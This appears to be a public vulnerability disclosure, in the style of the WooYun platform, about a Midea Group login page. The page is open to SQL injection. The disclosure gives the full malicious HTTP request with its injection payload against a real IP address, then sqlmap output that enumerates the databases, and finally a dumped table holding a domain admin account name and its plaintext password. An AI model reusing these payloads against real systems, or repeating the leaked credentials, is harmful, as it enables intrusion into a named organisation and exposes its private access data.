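2015-04-02: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly
2015-05-17: The vendor has actively ignored the vulnerability; details are disclosed to the public
A Midea Group service has a vulnerability that leaks domain information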
POST /manager/login.php?action=login HTTP/1.1
Content-Length: 105
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://202.104.30.186:80/
Cookie: PHPSESSID=g0mcm46780qfs2ac6cdeou0rl6
Host: 202.104.30.186
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

admin%5bname%5d=-1'%20OR%203*2*1%3d6%20AND%20000129%3d000129%20--%20&admin%5bpassword%5d=g00dPa%24%24w0rD
[*] starting at 00:57:18

[00:57:18] [INFO] parsing HTTP request from '1'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[00:57:22] [INFO] resuming back-end DBMS 'mysql'
[00:57:22] [INFO] testing connection to the target URL
[00:57:22] [INFO] heuristics detected web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #2*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: admin[name]=-1' OR 32 AND SLEEP(5)-- ZOyO1=6 AND 000129=000129 -- &admin[password]=g00dPa$$w0rD

Place: (custom) POST
Parameter: #1*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: admin[name]=-1' OR 3 AND SLEEP(5)-- KyjK21=6 AND 000129=000129 -- &admin[password]=g00dPa$$w0rD
---
there were multiple injection points, please select the one to use for following injections:
[0] place: (custom) POST, parameter: #1*, type: Unescaped numeric (default)
[1] place: (custom) POST, parameter: #2*, type: Unescaped numeric
[q] Quit
> 1
[00:57:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[00:57:25] [INFO] fetching database names
[00:57:25] [INFO] fetching number of databases
[00:57:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[00:57:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
4
[00:57:39] [INFO] retrieved:
[00:57:49] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[00:59:24] [INFO] retrieved: mysql
[00:59:53] [INFO] retrieved: per
[01:00:16] [ERROR] invalid character detected. retrying..
[01:00:16] [WARNING] increasing time delay to 2 seconds
formance_schema
[01:02:30] [INFO] retrieved: unnoo
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] unnoo
Domain information disclosure
+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+
| id | path                   | log_ip         | user_deep | domain_ip    | domain_name  | create_type | domain_password | domain_admin_name |
+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+
| 9  | \\\\172.16.15.130\\123 | 202.104.30.186 | 2         | 10.16.15.240 | midea.com.cn | 2           | zv7LW4          | mxpt_bind         |
+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)